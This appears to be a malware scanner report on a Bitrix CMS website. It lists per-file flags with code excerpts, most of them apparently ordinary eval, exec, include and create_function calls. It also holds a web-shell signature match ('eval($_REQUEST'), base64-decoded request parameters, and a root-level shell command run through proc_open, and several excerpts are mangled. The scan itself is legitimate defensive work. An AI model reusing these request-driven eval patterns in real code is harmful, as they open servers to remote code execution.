eval($eval); } $entity = $entity_data_class::getEntity(); $uFields = $USER_FIELD_MANAGER->getUserFields('HLBLOCK_'.$hlblock['ID']); foreach ($uFields as $uField) { if ($uField['MULTIPLE'] == 'N') { $params = array( 'required' => $uField['MANDATORY'] == 'Y' ); $field = $USER_FIELD_MANAGER->getEntityField($uField, $uField['FIELD_NAME'], $params); $entity->addField($field); foreach ($USER_FIELD_MANAGER->getEntityReferences($uField, $field) as $reference) { $entity->addField($reference); } } else { ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/perfmon/admin/perfmon_db_server.php

Size: 32.43 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 651 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/perfmon/admin/perfmon_row_edit.php

Size: 17.01 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_LNUMBER || $tokens[$pos][0] === T_DNUMBER || $tokens[$pos][0] === T_CONSTANT_ENCAPSED_STRING) { $result = eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_ARRAY) { $pos++; while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITESPACE) $pos++; if ($tokens[$pos][0] !== "(") return; else $pos++; $result = array(); while (true) { while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITES...

/var/www/kievflotq/kievflot.ua/bitrix/modules/clouds/admin/clouds_file_list.php

Size: 26.59 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 103 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/var/www/kievflotq/kievflot.ua/bitrix/modules/mobileapp/install/components/bitrix/mobileapp.menu/templates/.default/template.php

Size: 12.57 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("showAuthForm");
                }
            }
    <?endif;
?>

    if(BX.PULL)
    {
        BX.addCustomEvent("onPullExtendWatch", function(data) {
            BX.PULL.extendWatch(data.id);
        });

        BX.addCustomEvent("thisPageWillDie", function(data) {
            BX.PULL.clearWatch(data.page_id);
        });

        BX.addCustomEvent("onPullEvent", function (module_id, command, params)
        {
            if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
            {
                //app.onCustomEvent('onPullOnline', {...

/var/www/kievflotq/kievflot.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_read_file.php

Size: 3.33 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 4 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_list_files.php

Size: 1.04 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 4 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/general/blog_user.php

Size: 23.00 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item""\$item=IntVal(\$item);")); $dbUserGroups CBlogUserGroup::GetList( array(), array("ID" => $arGroups"BLOG_ID" => $blogID), falsefalse, array("ID") ); $arGroups = array(); while ($arUserGroup $dbUserGroups->Fetch()) $arGroups[] = IntVal($arUserGroup["ID"]); if ($action == BLOG_ADD$arCurrentGroups CBlogUser::GetUserGroups($ID$blogID""$selectType); foreach($arGroups as $val) { if ($val != && $val != 2) { if ($action == BLOG_CHANGE || $action == BLOG_ADD...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/general/blog.php

Size: 62.20 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/index.php

Size: 19.61 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 402 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/blog/install/events/set_events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/script.php

Size: 26.06 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Line: 140 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag + "_open");

    if (tagOpen == 0)
    {
        if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
        {
            eval(thetag + "_open = 1");
            // Change the button status

            pushstack(bbtags, thetag);
            cstat();
        }
    }
    else
    {
        // Find the last occurance of the opened tag
        lastindex = 0;

        for (i = 0; i < bbtags.length; i++ )
        {
            if ( bbtags[i] == thetag )
            {
                lastindex = i;
            }
        }

        // Close all tags opened up to that tag was opened
        while (bbtags[lastindex])
        {
            tagR...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/template.php

Size: 21.58 kB Created: 2017-11-21 16:21:47 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 242 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/micro/template.php

Size: 5.14 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 87 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.popular_blogs/component.php

Size: 5.77 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i = 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog = CBlog::GetByID($blogID); $arBlog = CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php

Size: 22.93 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Line: 97 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag + "_open");

    if (tagOpen == 0)
    {
        if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
        {
            eval(thetag + "_open = 1");
            // Change the button status

            pushstack(bbtags, thetag);
            cstat();
        }
    }
    else
    {
        // Find the last occurance of the opened tag
        lastindex = 0;

        for (i = 0; i < bbtags.length; i++ )
        {
            if ( bbtags[i] == thetag )
            {
                lastindex = i;
            }
        }

        // Close all tags opened up to that tag was opened
        while (bbtags[lastindex])
        {
            tagR...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php

Size: 23.87 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php

Size: 11.35 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag + "_open");

    if (tagOpen == 0)
    {
        if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
        {
            eval(thetag + "_open = 1");
            // Change the button status

            pushstack(bbtags, thetag);
            cstat();
        }
    }
    else
    {
        // Find the last occurance of the opened tag
        lastindex = 0;

        for (i = 0; i < bbtags.length; i++ )
        {
            if ( bbtags[i] == thetag )
            {
                lastindex = i;
            }
        }

        // Close all tags opened up to that tag was opened
        while (bbtags[lastindex])
        {
            tagR...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php

Size: 21.46 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.edit/.default/template.php

Size: 25.44 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php

Size: 21.68 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/scripts_for_editor.php

Size: 15.83 kB Created: 2017-11-21 16:21:47 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                            }
                        }

                        BX.ajax.processScripts(scripts, true);
    //                    commentEr object may be set in template
                        if(window.commentEr && window.commentEr == "Y")
                        {
                            BX('err_comment_'+this.id[1]).innerHTML = data;
                        }
                        else
                        {
                            if(BX('edit_id').value > 0)
                            {
                                var commentId = 'blg-comment-'+this.id[1];
                                if(BX(commentId))
                                {
                                    var newComment = BX.create('div',{'html':data});    // tmp container for data
    //...

/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/template.php

Size: 33.53 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 3
DescriptionMatch

Exploit execution Line: 161 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

Exploit execution Line: 23 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

Exploit execution Line: 24 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/scripts_for_editor.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/seo/admin/seo_tools.php

Size: 39.90 kB Created: 2017-11-21 16:21:48 Modified: 2023-06-30 13:57:54 Dangers: 4
DescriptionMatch

Exploit execution Line: 103 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_changer_link'])

Exploit execution Line: 106 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_final'])

Exploit execution Line: 113 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_win_changer_link'])

Exploit execution Line: 116 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['title_win_final'])

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list/templates/slider_big/template.php

Size: 16.32 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Line: 338 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" + res[ii].href + "');};");
        res[ii].parentNode.insertBefore(div, res[ii]);
        res[ii].onmouseover = function()
        {
            this.previousSibling.onshow();
            this.bxMouseOver = 'Y';
        };
        res[ii].onmouseout = function()
        {
            this.bxMouseOver = 'N';
            var __this = this;
            setTimeout(
                function()
                {
                    if (__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
                    {
                        __this.previousSibling...

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 18.87 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 144 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 30 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php

Size: 12.64 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 110 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*width*/

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php

Size: 9.46 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var result = " + data + "; "); }
            if (result['status'] == 'inprogress')
            {
                document.getElementById('photogallery_recalc').innerHTML = result['text'];
                if (__this_source.bReady == false)
                {
                    document.getElementById('ButtonPhotoGalleryRecalcStart').disabled = false;
                    document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled = false;
                    document.getElementById('ButtonPhotoGalleryRecalcStop').disabled = true;
                }
                else
                {
                    document.getElementById(...

/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 30.03 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/compression/include.php

Size: 3.30 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 42 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/compression/table.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/classes/general/editor_utils.php

Size: 8.27 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($code); echo '#BX_RENDERED_COMPONENT#'$s ob_get_contents(); ob_end_clean(); return $s; } function _RenderAllComponents($arParams$bLPA) { global $APPLICATION$USER$s ''$arPHP PHPParser::ParseFile($arParams['source']); $l count($arPHP); if ($l 0) { $new_source ''$end 0$comp_count 0ob_start(); for ($n 0$n<$l$n++) { $src $arPHP[$n][2]; if (SubStr($src05) == "<?"."php"$src SubStr($src5); else $src SubStr($src2); $src SubStr($src0, -2); $co...

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/options.php

Size: 65.77 kB Created: 2017-06-21 17:31:50 Modified: 2023-06-30 13:57:51 Dangers: 2
DescriptionMatch

Exploit execution Line: 1032 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/'.LANGUAGE_ID.'/admin/fileman_js.php')

Exploit execution Line: 1034 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/en/admin/fileman_js.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/fileman.php

Size: 71.53 kB Created: 2017-06-21 17:31:50 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit execution Line: 248 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/admin/fileman_js.php

Size: 1.58 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Dangers: 2
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/'.LANGUAGE_ID.'/admin/fileman_js.php')

Exploit execution Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/fileman/lang/en/admin/fileman_js.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/admin/fileman_admin.php

Size: 51.04 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 17 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/fileman_access.php")

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

posix_getpwuid(fileowner($fnameConverted)); $arrFileGroup = posix_getgrgid(filegroup($fnameConverted)); $showField .= " ".$arrFileOwner['name']." ".$arrFileGroup['name']; } } else $showField = "&nbsp;"; } $row->AddField("PERMS", $showField); } $showField = ""; if (in_array("PERMS_B", $arVisibleColumns)) { $showField = "&nbsp;"; if(($USER->CanDoOperation('fileman_view_permissions') || $USER->CanDoOperation('fileman_edit_all_settings')) && $USER->CanDoFileOperation('fm_view_permission', $arPath)) ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/b24connector/install/components/bitrix/b24connector.button.list/ajax.php

Size: 3.73 kB Created: 2017-11-21 16:21:54 Modified: 2023-06-30 13:57:51 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request = Context::getCurrent()->getRequest(); $this->action = $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/include/actionsdefinitions.php

Size: 14.99 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 172 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

Function strrev eval_strrev Line: 173 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/include/rolesdefinitions.php

Size: 2.22 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 64 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

Function strrev eval_strrev Line: 68 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/serversdata.php

Size: 5.18 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 38 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/action.php

Size: 6.78 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("", $paramCode); if(is_callable($func)) { $res = $func(); $retStr = str_replace('##CODE_PARAMS:'.$paramId.'##', $res, $retStr); } } } foreach ($this->freeParams as $key => $paramValue) $retStr = str_replace('##'.$key.'##', $paramValue, $retStr); return $retStr; } public function start(array $inputParams = array()) { if(!is_array($inputParams)) throw new \Bitrix\Main\ArgumentTypeException("inputParams", "array"); if(isset($this->actionParams["MODIFYERS"]) && is_array($this->action...

Function strrev exec_strrev Line: 154 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/monitoring.php

Size: 14.76 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$data', $item["DATA_FUNC"]); if(is_callable($func)) { $result = $func($data); } } else { if(isset($data["calcpr"])) { $data["data"] = $data["calcpr"]; } $result = static::extractRrdValue($data); } return $result; } protected static function extractRrdValue($data) { $result = false; if(isset($data["data"]) && is_array($data["data"])) { reset($data["data"]); $result = current($data["data"]); } return trim($result); } protected static function getAnsibleSetup($hostname) { static $i...

Function strrev exec_strrev Line: 340 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/helper.php

Size: 4.89 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 186 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/sitesdata.php

Size: 2.32 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 71 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/provider.php

Size: 6.41 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 24 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/actionmodifyer.php

Size: 3.35 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 14 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

Function strrev eval_strrev Line: 22 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/shelladapter.php

Size: 1.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Warns: 3 Dangers: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($command." > ".$outputPath." 2>&1 &"); return true; } public function getLastOutput() { return $this->resOutput; } public function getLastError() { return $this->resError; } public function syncExec($command) { $command = $this->prepareExecution($command); $retVal = 1; $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $pipes = array(); $process = proc_open('/bin/bash', $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0...

Function proc_close Line: 93 Warning

Potentially dangerous function `proc_close`

[https://www.php.net/proc_close]

proc_close($process)

Function proc_open Warning

Potentially dangerous function `proc_open`

[https://www.php.net/proc_open]

proc_open('/bin/bash', $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command); fclose($pipes[0]); $this->resOutput = stream_get_contents($pipes[1]); fclose($pipes[1]); $this->resError = stream_get_contents($pipes[2]); fclose($pipes[2]); $retVal = proc_close($process)

Function strrev exec_strrev Line: 39 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/actionsdata.php

Size: 6.54 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$param', $fBody); $result = $newfunc($buildParam); } return $result; } public static function setLogLevel($logLevel) { self::$logLevel = $logLevel; } public static function checkRunningAction() { $result = array(); $shellAdapter = new ShellAdapter(); $execRes = $shellAdapter->syncExec("sudo -u root /opt/webdir/bin/bx-process -a list -o json"); $data = $shellAdapter->getLastOutput(); if($execRes) { $arData = json_decode($data, true); $result = array(); if(isset($arData["params"])...

